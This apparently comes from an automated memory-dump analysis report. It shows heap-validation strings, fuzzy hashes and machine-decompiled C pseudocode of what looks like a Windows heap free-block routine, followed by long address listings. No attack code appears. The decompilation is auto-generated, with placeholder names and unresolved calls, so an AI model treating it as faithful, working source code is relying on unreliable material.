0x00b34710
0x00b3471a
0x00b34720
0x00b34720
0x00b34722
0x00b3472c
0x00000000
0x00b3472e
0x00b3472e
0x00000000
0x00b3472e
0x00b3472c
0x00b34738
0x00b3473c
0x00b3474b
0x00b34751
0x00b34751
0x00000000
0x00b3473c
0x00b348f4
0x00b348f4
0x00000000
0x00b348f4

Strings

HEAP: , xrefs: 00B3465F, 00B346C0, 00B347D3, 00B3485E, 00B34924, 00B34978
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 00B3486F
HEAP[%wZ]: , xrefs: 00B34652, 00B346B3, 00B347C6, 00B34851, 00B34917, 00B3496B
Non-Dedicated free list element %p is out of order, xrefs: 00B3466B
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 00B34992
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 00B3493D
dedicated (%04Ix) free list element %p is marked busy, xrefs: 00B346CF
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 00B347E2

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 198b9c6ececae843a83a8ef8501191c795ea794d27163d225ace0c31a3c52d52
Instruction ID: edf0924b26334e446602e9aaade8165840ff9a5a764fc6fb919108f96d795f96
Opcode Fuzzy Hash: 198b9c6ececae843a83a8ef8501191c795ea794d27163d225ace0c31a3c52d52
Instruction Fuzzy Hash: 8AF13231A10645EFCB25CF68C891BAAF7F5FF09304F6485A9E44697281D734B989CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A9A309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00A9A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0xb68a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00A9A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00A9DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00A79373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00A7A9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0xb68748 - 1;
						if( *0xb68748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00A7B150();
								__eflags =  *0xb67bc8;
								if( *0xb67bc8 == 0) {
									__eflags = 1;
									E00B32073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0xb68748 - 1;
							if( *0xb68748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00AA174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00A97D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E00B314FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00A79373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00A79819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0xb68748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00A7B150();
											} else {
												E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00A7B150();
											_pop(_t491);
											__eflags =  *0xb67bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E00B32073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E00B3A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00A9A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00A97D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00A97D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E00B31411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00A97D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00A97D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0xb68748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00A7B150();
							__eflags =  *0xb67bc8;
							if( *0xb67bc8 == 0) {
								__eflags = 0;
								E00B32073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0xb68748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00A7B150();
												} else {
													E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00A7B150();
												__eflags =  *0xb67bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E00B32073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E00B3A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00A9A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00A9B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00A9A830(_t553, _v64, _v24);
								_t286 = E00A97D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00A97D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E00B31411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00A97D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00A97D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E00B31411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00AA174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00A9B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00A97D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E00B314FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00A999BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00A9A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00AAABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x00a9a309
0x00a9a316
0x00a9a319
0x00a9a31d
0x00a9a32d
0x00a9a331
0x00ae1e0d
0x00ae1e10
0x00a9a3cb
0x00a9a3cb
0x00a9a3bd
0x00a9a3c3
0x00a9a3c3
0x00a9a33a
0x00ae1e17
0x00ae1e1b
0x00ae1e1d
0x00ae1e2f
0x00ae1e34
0x00ae1e36
0x00ae1e3c
0x00ae1e3c
0x00ae1e3c
0x00ae1e3c
0x00ae1e36
0x00ae1e42
0x00ae1e45
0x00ae1e47
0x00a9a3f8
0x00a9a3f8
0x00a9a3fb
0x00a9a3fd
0x00ae1e50
0x00a9a403
0x00a9a411
0x00a9a411
0x00a9a411
0x00a9a41e
0x00a9a420
0x00a9a424
0x00a9a427
0x00a9a7c9
0x00a9a7cd
0x00a9a7d2
0x00a9a7d9
0x00a9a7e0
0x00a9a7e3
0x00a9a7ed
0x00a9a7f3
0x00a9a7f9
0x00a9a7ff
0x00a9a802
0x00a9a807
0x00a9a809
0x00a9a809
0x00a9a809
0x00a9a80f
0x00a9a80f
0x00a9a812
0x00a9a81c
0x00a9a821
0x00a9a824
0x00a9a42d
0x00a9a42d
0x00a9a42d
0x00a9a42d
0x00a9a42d
0x00a9a436
0x00a9a43a
0x00a9a609
0x00a9a60d
0x00a9a612
0x00a9a616
0x00a9a61a
0x00ae1e57
0x00ae1e59
0x00000000
0x00000000
0x00ae1e5f
0x00a9a620
0x00a9a627
0x00ae1e64
0x00ae1e66
0x00ae1e6c
0x00ae1e72
0x00ae1e76
0x00ae1e95
0x00ae1e9a
0x00ae1e78
0x00ae1e8d
0x00ae1e92
0x00ae1ea0
0x00ae1ea5
0x00ae1eaa
0x00ae1eb2
0x00ae1eb6
0x00ae1eb9
0x00ae1eb9
0x00ae1ebe
0x00ae1ec2
0x00ae1ec2
0x00ae1e66
0x00a9a62d
0x00a9a633
0x00a9a636
0x00a9a63a
0x00a9a63c
0x00a9a640
0x00a9a642
0x00a9a644
0x00a9a644
0x00a9a644
0x00a9a64d
0x00a9a64d
0x00a9a651
0x00a9a655
0x00ae1eca
0x00ae1ed1
0x00000000
0x00000000
0x00ae1ed7
0x00000000
0x00a9a65b
0x00a9a669
0x00a9a66e
0x00a9a670
0x00000000
0x00000000
0x00a9a676
0x00a9a67b
0x00a9a680
0x00a9a682
0x00ae1f1a
0x00a9a688
0x00a9a688
0x00a9a688
0x00a9a68a
0x00a9a68d
0x00ae1f24
0x00ae1f2a
0x00ae1f31
0x00ae1f43
0x00ae1f43
0x00ae1f31
0x00a9a693
0x00a9a697
0x00a9a69d
0x00a9a6a0
0x00a9a6a6
0x00a9a6a8
0x00a9a6a8
0x00a9a6a8
0x00a9a6a8
0x00a9a6b2
0x00a9a6b7
0x00a9a6c1
0x00a9a6c6
0x00a9a6d2
0x00a9a6d9
0x00a9a6e3
0x00a9a6e6
0x00a9a6eb
0x00a9a6ed
0x00a9a6ed
0x00a9a6ed
0x00a9a6ed
0x00a9a6f3
0x00a9a6f8
0x00a9a702
0x00a9a70a
0x00a9a70e
0x00a9a71a
0x00a9a71e
0x00ae1fcb
0x00ae1fcf
0x00ae1fdd
0x00ae1fe3
0x00ae1fe3
0x00a9a724
0x00a9a728
0x00a9a72a
0x00a9a72d
0x00a9a737
0x00a9a73a
0x00a9a73c
0x00a9a742
0x00a9a748
0x00ae1f4d
0x00ae1f50
0x00ae1f56
0x00ae1f5c
0x00ae1f5f
0x00ae1f7e
0x00ae1f83
0x00ae1f61
0x00ae1f76
0x00ae1f7b
0x00ae1f89
0x00ae1f8e
0x00ae1f93
0x00ae1f94
0x00ae1f9a
0x00ae1f9c
0x00ae1f9e
0x00ae1fa1
0x00ae1fa1
0x00ae1fa6
0x00ae1fa6
0x00ae1f50
0x00a9a74e
0x00a9a751
0x00a9a754
0x00a9a75d
0x00a9a75e
0x00a9a762
0x00a9a767
0x00ae1faf
0x00ae1fb0
0x00ae1fb9
0x00ae1fbe
0x00ae1fc2
0x00ae1fc2
0x00a9a76d
0x00a9a76d
0x00a9a775
0x00a9a778
0x00a9a77d
0x00a9a77d
0x00a9a71e
0x00a9a782
0x00a9a787
0x00a9a789
0x00ae1ff3
0x00a9a78f
0x00a9a78f
0x00a9a78f
0x00a9a791
0x00a9a794
0x00ae1ffd
0x00ae2006
0x00ae200c
0x00ae2017
0x00ae2019
0x00ae2024
0x00ae2024
0x00ae2024
0x00ae2047
0x00ae2047
0x00ae200c
0x00a9a79a
0x00a9a79f
0x00a9a7a4
0x00a9a7a9
0x00a9a7ab
0x00ae205a
0x00a9a7b1
0x00a9a7b1
0x00a9a7b1
0x00a9a7b3
0x00a9a7b6
0x00000000
0x00a9a7bc
0x00ae2066
0x00ae2068
0x00ae2073
0x00ae2073
0x00ae2073
0x00ae2078
0x00ae2079
0x00ae207d
0x00000000
0x00ae207d
0x00a9a7b6
0x00a9a440
0x00a9a440
0x00a9a440
0x00a9a446
0x00a9a44c
0x00a9a44f
0x00a9a453
0x00a9a455
0x00ae20b3
0x00ae20b9
0x00ae20b9
0x00a9a45d
0x00a9a460
0x00a9a464
0x00a9a466
0x00a9a46b
0x00a9a46f
0x00a9a471
0x00a9a471
0x00a9a471
0x00a9a474
0x00a9a479
0x00a9a47d
0x00a9a47f
0x00ae2229
0x00ae222f
0x00a9a3c8
0x00a9a3c8
0x00a9a3ca
0x00a9a3ca
0x00000000
0x00a9a3ca
0x00ae2235
0x00ae223a
0x00ae223a
0x00000000
0x00000000
0x00ae2240
0x00ae2246
0x00ae224a
0x00ae2269
0x00ae226e
0x00ae224c
0x00ae2261
0x00ae2266
0x00ae2274
0x00ae2279
0x00ae227e
0x00ae2286
0x00ae2288
0x00ae228d
0x00ae228d
0x00ae2292
0x00ae2292
0x00ae2295
0x00ae2295
0x00000000
0x00ae2295
0x00a9a485
0x00a9a489
0x00a9a48b
0x00a9a48f
0x00a9a493
0x00a9a497
0x00a9a49b
0x00a9a4bb
0x00a9a4bb
0x00a9a4bd
0x00a9a4ff
0x00a9a4ff
0x00a9a501
0x00a9a505
0x00a9a50f
0x00a9a517
0x00a9a51b
0x00a9a527
0x00a9a52b
0x00ae2182
0x00ae2185
0x00ae2193
0x00ae2199
0x00ae2199
0x00a9a531
0x00a9a535
0x00a9a538
0x00a9a548
0x00a9a54b
0x00a9a54d
0x00a9a553
0x00a9a559
0x00ae2100
0x00ae2103
0x00ae2109
0x00ae210f
0x00ae2112
0x00ae2131
0x00ae2136
0x00ae2114
0x00ae2129
0x00ae212e
0x00ae213c
0x00ae2141
0x00ae2147
0x00ae214d
0x00ae2151
0x00ae2154
0x00ae2154
0x00ae2159
0x00ae2159
0x00ae2103
0x00a9a55f
0x00a9a562
0x00a9a565
0x00a9a567
0x00ae2162
0x00a9a56d
0x00a9a574
0x00a9a575
0x00a9a579
0x00a9a57e
0x00ae2169
0x00ae216a
0x00ae2170
0x00ae2175
0x00ae2179
0x00ae2179
0x00a9a57e
0x00a9a584
0x00a9a58f
0x00a9a58f
0x00a9a52b
0x00a9a5ad
0x00a9a5bc
0x00a9a5c1
0x00a9a5c6
0x00a9a5cb
0x00a9a5cd
0x00ae21a9
0x00a9a5d3
0x00a9a5d3
0x00a9a5d3
0x00a9a5d5
0x00a9a5d8
0x00ae21b3
0x00ae21bc
0x00ae21c2
0x00ae21cd
0x00ae21cf
0x00ae21da
0x00ae21da
0x00ae21da
0x00ae21f7
0x00ae21f7
0x00ae21c2
0x00a9a5de
0x00a9a5e3
0x00a9a5e8
0x00a9a5ea
0x00ae220a
0x00a9a5f0
0x00a9a5f0
0x00a9a5f0
0x00a9a5f2
0x00a9a5f5
0x00ae2219
0x00ae221b
0x00ae208c
0x00ae208c
0x00ae208c
0x00ae2095
0x00ae2096
0x00ae2097
0x00ae2098
0x00ae20a4
0x00ae20a5
0x00ae20a9
0x00ae20a9
0x00000000
0x00a9a5f5
0x00a9a4bf
0x00a9a4d3
0x00a9a4d8
0x00a9a4da
0x00ae1ede
0x00ae1ede
0x00ae1ee4
0x00ae1ee9
0x00000000
0x00000000
0x00ae1f07
0x00000000
0x00ae1f07
0x00a9a4e0
0x00a9a4e5
0x00a9a4e7
0x00ae20cb
0x00a9a4ed
0x00a9a4ed
0x00a9a4ed
0x00a9a4f2
0x00a9a4f5
0x00ae20d5
0x00ae20de
0x00ae20e4
0x00ae20f6
0x00ae20f6
0x00ae20e4
0x00a9a4fb
0x00000000
0x00a9a4fb
0x00a9a4a1
0x00a9a4a4
0x00a9a4a8
0x00000000
0x00000000
0x00a9a4aa
0x00a9a4ac
0x00000000
0x00000000
0x00a9a4b2
0x00a9a4b5
0x00000000
0x00000000
0x00000000
0x00a9a4b5
0x00a9a43a
0x00a9a340
0x00a9a346
0x00a9a600
0x00000000
0x00a9a600
0x00a9a34f
0x00a9a351
0x00a9a358
0x00a9a3c6
0x00000000
0x00a9a371
0x00a9a37a
0x00a9a37f
0x00a9a382
0x00a9a384
0x00a9a394
0x00000000
0x00a9a396
0x00a9a399
